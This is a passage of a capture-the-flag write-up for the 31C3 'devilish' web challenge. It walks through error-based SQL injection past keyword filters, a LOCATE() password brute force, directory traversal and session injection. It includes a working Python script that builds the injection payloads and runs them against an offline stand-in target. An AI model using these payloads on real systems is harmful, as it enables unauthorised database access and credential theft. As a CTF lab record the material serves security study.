I'll talk about devilish, a web challenge from the 31C3 CTF 2014. Credit for this one also goes to one of our team members, Michael, because we worked on this challenge together.
Well, let's get to business with devilish, a 30-point challenge. 24 teams solved it.
Here is the description of the challenge:
It's some devilish community public portal, we're pretty sure there's something else out there, a private portal maybe, we'd like to know the secret behind it
When we go to the web page we see a nice vampire-ish page:
After some research we can see that there is a SQL injection vulnerability in the PROFILE page. The problem is that the page uses a font made of Halloween images, so you have to keep viewing the HTML source to read the error message from the SQL injection. One of our team members, Michael, had the idea of disabling a Firefox option: just set the option to false.
Above is the page before changing the option, and here it is after:
OK, so now we know where the injection is and we can run queries. But there are a lot of filters that prevent us from enumerating columns: information_schema, table, or and union are all filtered, so we need a way around them. What we need is the name of the password column so we can log in.
To enumerate the columns without those keywords we can use error-based SQL injection with a duplicate-key error, which enumerates the columns for us. So the final exploit for the column problem is:
Which gives us:
This is the column we need to extract the password from. So let's do that:
But when we try to log in with that password it doesn't work, so maybe the error does not show all the characters of the password (MySQL truncates the value it prints in a duplicate-entry error). We need to brute-force the rest of the password with LOCATE(). Here is a script that Michael wrote really fast:
Which gives us Dracula's account password:
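Neither the column-enumeration payload nor Michael's script is reproduced in the post, so here is an added example (mine, not the team's code) of the two error-based steps described above: leak a value through the classic floor(rand(0)*2)/GROUP BY duplicate-key error, then, because MySQL reports at most 64 characters of the duplicated key, finish the value with a LOCATE() prefix brute force. Assumptions: the column is called `pwd` and the user table `users` (the post gives neither), the filter rejects the listed keywords as whole words (a substring filter would also catch `floor`), and the `FakeTarget` class is a constructed stand-in for the injectable PROFILE page so the script runs offline; against the real site its two methods would be HTTP requests that scrape the error out of the HTML.

```python
"""Leak a column value via a MySQL duplicate-key error, then finish it with LOCATE().
Added example; not the team's script, which the post omits."""
import re
from typing import Callable, Optional

# Keywords the post says the PROFILE page rejects, checked as whole words here.
# If the filter were a substring match, "or" would also catch floor().
FILTERED = re.compile(r"\b(information_schema|table|or|union)\b", re.I)
DUP_ENTRY = re.compile(r"Duplicate entry '(.*)' for key")
DUP_ENTRY_LIMIT = 64   # MySQL reports at most 64 characters of the duplicated key
# Candidate characters, rough English frequency order (assumption: printable ASCII).
CHARSET = "etaoinsrhldcumfpgwybvkxjqzETAOINSRHLDCUMFPGWYBVKXJQZ0123456789!@#$%^&*()_-+=.,"


def filtered_words(sql: str) -> list:
    """Return the blocked keywords a payload would trip."""
    return [m.lower() for m in FILTERED.findall(sql)]


def dup_entry_payload(expr: str, from_table: str) -> str:
    """Leak `expr` with the floor(rand(0)*2) GROUP BY trick: the repeated group key
    makes MySQL raise "Duplicate entry '<expr>1' for key 'group_key'".
    `from_table` only has to exist and hold at least three rows."""
    return (f"(select 1 from (select count(*),concat(({expr}),"
            f"floor(rand(0)*2))x from {from_table} group by x)a)")


def leaked_value(error_text: str) -> Optional[str]:
    """Pull the data out of the error. The entry is '<data><digit>' unless MySQL cut
    it at DUP_ENTRY_LIMIT; then the tail is gone and the last character may or may
    not be the floor() digit, so the caller has to re-check the prefix."""
    m = DUP_ENTRY.search(error_text)
    if not m:
        return None
    entry = m.group(1)
    return entry if len(entry) >= DUP_ENTRY_LIMIT else entry[:-1]


def locate_payload(prefix: str, column: str) -> str:
    """True when `column` starts with `prefix`. The hex literal needs no quotes;
    BINARY makes LOCATE() case-sensitive (it is case-insensitive by default)."""
    return f"locate(binary 0x{prefix.encode().hex()},{column})=1"


def extend_with_locate(prefix: str, column: str, is_true: Callable[[str], bool],
                       charset: str = CHARSET, max_len: int = 128) -> str:
    """Grow a known prefix one character at a time with the boolean oracle."""
    # Drop trailing characters until the leaked prefix is confirmed (see leaked_value).
    while prefix and not is_true(locate_payload(prefix, column)):
        prefix = prefix[:-1]
    while len(prefix) < max_len:
        for c in charset:
            if is_true(locate_payload(prefix + c, column)):
                prefix += c
                break
        else:
            break   # no character extends it: the value is complete
    return prefix


def recover_value(get_error: Callable[[str], str], is_true: Callable[[str], bool],
                  column: str, from_table: str) -> str:
    """Whole procedure: take what the error shows, then brute-force the rest."""
    payload = dup_entry_payload(column, from_table)
    assert not filtered_words(payload), "payload would be rejected by the filter"
    prefix = leaked_value(get_error(payload)) or ""
    return extend_with_locate(prefix, column, is_true)


class FakeTarget:
    """Constructed stand-in for the injectable page so the script runs offline. It
    holds a made-up value and answers only the two payload shapes built above."""
    def __init__(self, secret: str):
        self.secret = secret

    def get_error(self, payload: str) -> str:
        if "floor(rand(0)*2)" not in payload:
            return "You have an error in your SQL syntax"
        entry = (self.secret + "1")[:DUP_ENTRY_LIMIT]   # MySQL-style truncation
        return f"Duplicate entry '{entry}' for key 'group_key'"

    def is_true(self, condition: str) -> bool:
        m = re.fullmatch(r"locate\(binary 0x([0-9a-f]*),\w+\)=1", condition)
        return bool(m) and self.secret.startswith(bytes.fromhex(m.group(1)).decode())


if __name__ == "__main__":
    # Constructed 70-character secret: longer than the error message can show.
    target = FakeTarget("N0sferatu!" * 7)
    print(recover_value(target.get_error, target.is_true, "pwd", "users"))
```

The prefix re-check in `extend_with_locate` matters: when the leaked entry is exactly 64 characters long you cannot tell from the error alone whether its last character is data or the trailing floor() digit, so the script confirms the prefix with LOCATE() before extending it.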
After logging in, we easily found a directory traversal vulnerability that confirms there is another site on the server, as the challenge description hinted. Its source code is different from the original site's in /var/www/html:
We can also read the source code of some pages, which gives us valuable information for the next step:
http://188.40.18.70/__WebSiteFuckingPrivateContentNotForPublic666/LOGIN_HEAD
shows us the following code:
And here is the LOGIN_HEAD from devilish.local:
So we need to access the second website, but how? You have two options: either use curl and set the Host header, or edit your /etc/hosts and add:
188.40.18.70 devilish.local
We used the second one; it is nicer to work from the web browser :). But when we go to the devilish.local site there is no login option, and we see this on the INDEX page:
So maybe the two sites share the same session. We go back to the first site and log in, but this time we also send the parameter
So we use Firefox's HackBar and send this:
$_SESSION=$_POST;
url :
So the